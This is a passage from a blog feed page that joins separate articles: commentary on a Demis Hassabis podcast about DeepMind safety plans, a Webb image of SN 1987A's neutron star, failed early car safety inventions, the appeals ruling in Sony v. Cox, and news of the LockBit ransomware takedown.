  7. (35: 30): What should governance for these systems look like? Demis says we all need to be involved in those decisions and reach consensus on what would be good for all, and this is why he emphases things that benefit everyone like AI for science. Easy to say, but needs specifics and actual plans.

  8. (37: 30): Dwarkesh asks the good question, why haven’t LLMs automated things more than they have? Demis says for general use cases the capabilities are not there yet for things such as planning, search and long term memory for prior conversations. He mentions future recommendation systems, a pet cause of mine. I think he is underestimating that the future simply is not evenly distributed yet.

  9. (40: 42) Demis says they are working on having a safety framework like those of OpenAI and Anthropic. Right now he says they have them implicitly on safety councils and so on that people like Shane chair, but they are going to be publicly talking about it this year. Excellent.

  10. (41: 30): Dwarkesh asks about model weights security, Demis connects to open model weights right away. Demis says Google has very strong world-class protections already and DeepMind doubles down on that, says all frontier labs should take such precautions. Access is a tricky issue. For open weights, he’s all for it for things like AlphaFold or AlphaGo that can’t be misused (and those are indeed open sourced now) but his question is, for frontier models, how do we stop bad actors at all scales from misusing them if we share the weights? He doesn’t know the answer and hasn’t heard a clear one anywhere.

  11. (46: 00) Asked what safety research will be DeepMind’s specialty, Demis first mentions them pioneering RLHF, which I would say has not been going well recently and definitely won’t scale. He then mentions self-play especially for boundary testing, we need automated testing, goes back to games. Not nothing, but seems like he should be able to do better.

  12. (47: 00) Demis is excited by multimodal use cases for LLMs like Gemini, and also excited on the progress in robotics, they like that it is a data-poor regime because it forces them to do good research. Multimodality starts out harder, then makes things easier once things get going. He expects places where self-play works to see better progress than other domains, as you would expect.

  13. (52: 00) Why build science AIs rather than wait for AGI? We can bring benefits to the world before AGI, and we don’t know how long AGI will take to arrive. Also real-world problems keep you honest, give you real world feedback.

  14. (54: 30) Standard ‘things are going great’ for the merger with Google Brain, calls Gemini the first fruit of the collaboration, strongly implies the ‘twins’ that inspired the name Gemini are Google Brain and DeepMind.

  15. (57: 20) Demis affirms ‘responsible scaling policies are something that is a very good empirical way to precommit to these kinds of things.’

  16. (58: 00) Demis says if a model helped enable a bioweapon or something similar, they’d need to ‘fix that loophole,’ the important thing is to detect it in advance. I always worry about such talk, because of its emphasis on addressing specific failure modes that you foresee, rather than thinking about failures in general.

While interesting throughout, nothing here was inconsistent with what we know about Demis Hassabis or DeepMind. Demis, Shane and DeepMind are clearly very aware of the problems that lie ahead of them, are motivated to solve them, and unfortunately are still unable to express detailed plans that seem hopeful for actually doing that. Demis seemed much more aware of this confusion than Shane did, which is hopeful. Games are still central to what Demis thinks about and plans for AI.

The best concrete news is that DeepMind will be issuing its own safety framework in the coming months.

Notes on Dwarkesh Patel’s Podcast with Demis Hassabis Read More »

daily-telescope:-finally,-we’ve-found-the-core-of-a-famous-supernova

Daily Telescope: Finally, we’ve found the core of a famous supernova

A dense subject —

In the astronomy community SN 1987A has somewhat legendary status.

Webb has observed the best evidence yet for emission from a neutron star at the site of Supernova 1987A.

Enlarge / Webb has observed the best evidence yet for emission from a neutron star at the site of Supernova 1987A.

NASA, ESA, CSA, STScI, et. al.

Welcome to the Daily Telescope. There is a little too much darkness in this world and not enough light, a little too much pseudoscience and not enough science. We’ll let other publications offer you a daily horoscope. At Ars Technica, we’re going to take a different route, finding inspiration from very real images of a universe that is filled with stars and wonder.

Good morning. It’s February 26, and today’s image highlights the core of a (relatively) nearby supernova.

In the astronomy community, SN 1987A has somewhat legendary status. The first observable light from this exploding star in the Large Magellanic Cloud reached Earth in February, almost 37 years ago to the day. It was the first supernova that astronomers were able to observe and study with modern telescopes. It was still discussed in reverent terms a few years later when I was an undergraduate student studying astronomy at the University of Texas.

One of the enduring mysteries of the supernova is that astronomers have been unable to find its collapsed core, where they would expect to see a neutron star—an ultra-dense object that results from the supernova explosion of a massive star. In recent years, ground-based telescopes have found hints of this collapsed core, but now the James Webb Space Telescope has found emission lines that almost certainly must come from a newly born neutron star.

The astronomical details can be found here. It’s a nice validation of our understanding about supernovae.

I would also like to acknowledge that the Daily Telescope has been anything but “daily” of late. This is due to a confluence of several factors, including a lot of travel and work on other projects, including four features in the last month or so. I’ve had to put some things on the back-burner. I don’t want to stop producing these articles, but I also can’t commit to writing one every day. Maybe it should be renamed? For now, I’m just going to try to do my best. I appreciate those who have written to ask where the Daily Telescope has been—well, all of you but the person who wrote a nasty note.

Source: NASA, ESA, CSA, STScI, et. al.

Do you want to submit a photo for the Daily Telescope? Reach out and say hello.

Daily Telescope: Finally, we’ve found the core of a famous supernova Read More »

it’s-no-accident:-these-automotive-safety-features-flopped

It’s no accident: These automotive safety features flopped

safety first —

Over the years, inventors have had some weird ideas about how to make cars safer.

a toy car crashing into another toy car

Aurich Lawson | Getty Images

Turn signals have been a vehicle safety staple since they first appeared on Buicks in 1939. Of course, many drivers don’t use them, perhaps believing that other motorists can telepathically divine others’ intentions.

More people might use turn signals if they knew that drivers’ failure to do so leads to more than 2 million accidents annually, according to a study conducted by the Society of Automotive Engineers. That’s 2 percent of all crashes, according to the National Highway Traffic Safety Administration. And not using turn signals increases the likelihood of an accident by 40 percent, according to the University of Michigan Research Institute.

Human nature could be to blame—death and injury will never happen to us, only others.

You wish.

So, is it any wonder that during the first six decades of automobile production, there were few safety features? The world into which the automobile was born was one in which horses powered most transportation, but that didn’t mean getting around was safe. Say a horse got spooked. If the animal was pulling a carriage, its actions could cause the carriage to barrel away or even overturn, injuring or killing its occupants. Or the horse could cause death directly. In fact, a surprising number of kings met their end over the centuries by a horse’s swift kick. And rail travel proved even deadlier. Studies comparing modern traffic accidents with those of the early 20th century reveal that death from travel is 90 percent less likely today than it was in 1925.

Yet America’s passive acceptance of death from vehicle travel in the late 19th and early 20th century explains why auto safety was sporadically addressed, if at all. Sure, there were attempts at offering basic safety in early automobiles, like windshield wipers and improved lighting. And some safety features endured, such as Ford’s introduction of safety glass as standard equipment in 1927 or GM’s turn signals. But while other car safety features appeared from time to time, many of them just didn’t pan out.

Dead ends on the road to safer cars

Among the earliest attempts at providing safety was the O’Leary Fender, invented by John O’Leary of Cohoes, New York, in 1906. “It is made of bands of iron of such shape and design that falling into it is declared to be like the embrace of a summer girl on a moonlit night on the shore,” wrote The Buffalo News in 1919, with more than a little poetic license.

Advertisement for Pennsylvania Vacuum Cup Tires by the Pennsylvania Rubber Company in Jeannette, Pennsylvania. The Pennsylvania Auto Tube is pictured, 1919.

Enlarge / Advertisement for Pennsylvania Vacuum Cup Tires by the Pennsylvania Rubber Company in Jeannette, Pennsylvania. The Pennsylvania Auto Tube is pictured, 1919.

Jay Paull/Getty Images

According to the account, O’Leary was so confident of the fender’s ability to save lives that he used his own child to prove its safety. “The babe was gathered up on the folds of the fender as tenderly as it had ever been in the arms of its mother,” the newspaper reported, “and was not only uninjured but seemed to enjoy the experience.”

There’s no word on what Mrs. O’Leary thought of using the couple’s child as a crash test dummy. But the invention seemed worthy enough that an unnamed car manufacturer battled O’Leary in court over it and lost. Ultimately, his victory proved futile, as the feature was not adopted.

Others also tried to bring some measure of safety to automobiles, chief among them the Pennsylvania Rubber Company of Jeanette, Pennsylvania. The company’s idea: make a tire tread of small suction cups to improve traction. Called the Pennsylvania Vacuum Cup tire, the product proved to be popular for a while, with reports of sales outnumbering conventional tires 10 to 1, according to the Salt Lake Tribune in 1919. While Pennsylvania wasn’t the only rubber company to offer vacuum cup tires, the concept had its day before fading, although the idea does resurface from time to time.

Nevertheless, safety remained unaddressed, even as the number of deaths was rising substantially.

“Last year more than 22,000 persons were killed in or by automobiles, and something like three quarters of a million injured,” wrote The New Republic in 1926. “The number of dead is almost half as large as the list of fatalities during the nineteen months of America’s participation in the Great War.”

“The 1925 total is 10 percent larger than that for 1924,” the publication added.

The chief causes cited were the same as they are today—namely, speeding, violating the rules of the road, inattention, inexperience, and confusion. But at least one automaker—Stutz—was trying to put safety first.

It’s no accident: These automotive safety features flopped Read More »

court-blocks-$1-billion-copyright-ruling-that-punished-isp-for-its-users’-piracy

Court blocks $1 billion copyright ruling that punished ISP for its users’ piracy

A man, surrounded by music CDs, uses a laptop while wearing a skull-and-crossbones pirate hat and holding one of the CDs in his mouth.

Getty Images | OcusFocus

A federal appeals court today overturned a $1 billion piracy verdict that a jury handed down against cable Internet service provider Cox Communications in 2019. Judges rejected Sony’s claim that Cox profited directly from copyright infringement committed by users of Cox’s cable broadband network.

Appeals court judges didn’t let Cox off the hook entirely, but they vacated the damages award and ordered a new damages trial, which will presumably result in a significantly smaller amount to be paid to Sony and other copyright holders. Universal and Warner are also plaintiffs in the case.

“We affirm the jury’s finding of willful contributory infringement,” said a unanimous decision by a three-judge panel at the US Court of Appeals for the 4th Circuit. “But we reverse the vicarious liability verdict and remand for a new trial on damages because Cox did not profit from its subscribers’ acts of infringement, a legal prerequisite for vicarious liability.”

If the correct legal standard had been used in the district court, “no reasonable jury could find that Cox received a direct financial benefit from its subscribers’ infringement of Plaintiffs’ copyrights,” judges wrote.

The case began when Sony and other music copyright holders sued Cox, claiming that it didn’t adequately fight piracy on its network and failed to terminate repeat infringers. A US District Court jury in the Eastern District of Virginia found the ISP liable for infringement of 10,017 copyrighted works.

Copyright owners want ISPs to disconnect users

Cox’s appeal was supported by advocacy groups concerned that the big-money judgment could force ISPs to disconnect more Internet users based merely on accusations of copyright infringement. Groups such as the Electronic Frontier Foundation also called the ruling legally flawed.

“When these music companies sued Cox Communications, an ISP, the court got the law wrong,” the EFF wrote in 2021. “It effectively decided that the only way for an ISP to avoid being liable for infringement by its users is to terminate a household or business’s account after a small number of accusations—perhaps only two. The court also allowed a damages formula that can lead to nearly unlimited damages, with no relationship to any actual harm suffered. If not overturned, this decision will lead to an untold number of people losing vital Internet access as ISPs start to cut off more and more customers to avoid massive damages.”

In today’s 4th Circuit ruling, appeals court judges wrote that “Sony failed, as a matter of law, to prove that Cox profits directly from its subscribers’ copyright infringement.”

A defendant may be vicariously liable for a third party’s copyright infringement if it profits directly from it and is in a position to supervise the infringer, the ruling said. Cox argued that it doesn’t profit directly from infringement because it receives the same monthly fee from subscribers whether they illegally download copyrighted files or not, the ruling noted.

The question in this type of case is whether there is a causal relationship between the infringement and the financial benefit. “If copyright infringement draws customers to the defendant’s service or incentivizes them to pay more for their service, that financial benefit may be profit from infringement. But in every case, the financial benefit to the defendant must flow directly from the third party’s acts of infringement to establish vicarious liability,” the court said.

Court blocks $1 billion copyright ruling that punished ISP for its users’ piracy Read More »

after-years-of-losing,-it’s-finally-feds’-turn-to-troll-ransomware-group

After years of losing, it’s finally feds’ turn to troll ransomware group

LOOK WHO’S TROLLING NOW —

Authorities who took down the ransomware group brag about their epic hack.

After years of losing, it’s finally feds’ turn to troll ransomware group

Getty Images

After years of being outmaneuvered by snarky ransomware criminals who tease and brag about each new victim they claim, international authorities finally got their chance to turn the tables, and they aren’t squandering it.

The top-notch trolling came after authorities from the US, UK, and Europol took down most of the infrastructure belonging to LockBit, a ransomware syndicate that has extorted more than $120 million from thousands of victims around the world. On Tuesday, most of the sites LockBit uses to shame its victims for being hacked, pressure them into paying, and brag of their hacking prowess began displaying content announcing the takedown. The seized infrastructure also hosted decryptors victims could use to recover their data.

The dark web site LockBit once used to name and shame victims, displaying entries such as

Enlarge / The dark web site LockBit once used to name and shame victims, displaying entries such as “press releases,” “LB Backend Leaks,” and “LockbitSupp You’ve been banned from Lockbit 3.0.”

this_is_really_bad

Authorities didn’t use the seized name-and-shame site solely for informational purposes. One section that appeared prominently gloated over the extraordinary extent of the system access investigators gained. Several images indicated they had control of /etc/shadow, a Linux file that stores cryptographically hashed passwords. This file, among the most security-sensitive ones in Linux, can be accessed only by a user with root, the highest level of system privileges.

Screenshot showing a folder named

Enlarge / Screenshot showing a folder named “shadow” with hashes for accounts including “root,” “daemon,” “bin,” and “sys.”

Other images demonstrated that investigators also had complete control of the main web panel and the system LockBit operators used to communicate with affiliates and victims.

Screenshot of a panel used to administer the LockBit site.

Enlarge / Screenshot of a panel used to administer the LockBit site.

Screenshot showing chats between a LockBit affiliate and a victim.

Enlarge / Screenshot showing chats between a LockBit affiliate and a victim.

The razzing didn’t stop there. File names of the images had titles including: “this_is_really_bad.png,” “oh dear.png,” and “doesnt_look_good.png.” The seized page also teased the upcoming doxing of LockbitSupp, the moniker of the main LockBit figure. It read: “Who is LockbitSupp? The $10m question” and displayed images of cash wrapped in chains with padlocks. Copying a common practice of LockBit and competing ransomware groups, the seized site displayed a clock counting down the seconds until the identifying information will be posted.

Screenshot showing

Enlarge / Screenshot showing “who is lockbitsupp?”

In all, authorities said they seized control of 14,000 accounts and 34 servers located in the Netherlands, Germany, Finland, France, Switzerland, Australia, the US, and the UK. Two LockBit suspects have been arrested in Poland and Ukraine, and five indictments and three arrest warrants have been issued. Authorities also froze 200 cryptocurrency accounts linked to the ransomware operation.

“At present, a vast amount of data gathered throughout the investigation is now in the possession of law enforcement,” Europol officials said. “This data will be used to support ongoing international operational activities focused on targeting the leaders of this group, as well as developers, affiliates, infrastructure, and criminal assets linked to these criminal activities.”

LockBit has operated since at least 2019 under the name “ABCD.” Within three years, it was the most widely circulating ransomware. Like most of its peers, LockBit operates under what’s known as ransomware-as-a-service, in which it provides software and infrastructure to affiliates who use it to compromise victims. LockBit and the affiliates then divide any resulting revenue. Hundreds of affiliates participated.

According to KrebsOnSecurity, one of the LockBit leaders said on a Russian-language crime forum that a vulnerability in the PHP scripting language provided the means for authorities to hack the servers. That detail led to another round of razzing, this time from fellow forum participants.

“Does it mean that the FBI provided a pen-testing service to the affiliate program?” one participant wrote, according to reporter Brian Krebs. “Or did they decide to take part in the bug bounty program? :):).”

Several members also posted memes taunting the group about the security failure.

“In January 2024, LockBitSupp told XSS forum members he was disappointed the FBI hadn’t offered a reward for his doxing and/or arrest, and that in response he was placing a bounty on his own head—offering $10 million to anyone who could discover his real name,” Krebs wrote. “‘My god, who needs me?’ LockBitSupp wrote on January 22, 2024. ‘There is not even a reward out for me on the FBI website.’”

After years of losing, it’s finally feds’ turn to troll ransomware group Read More »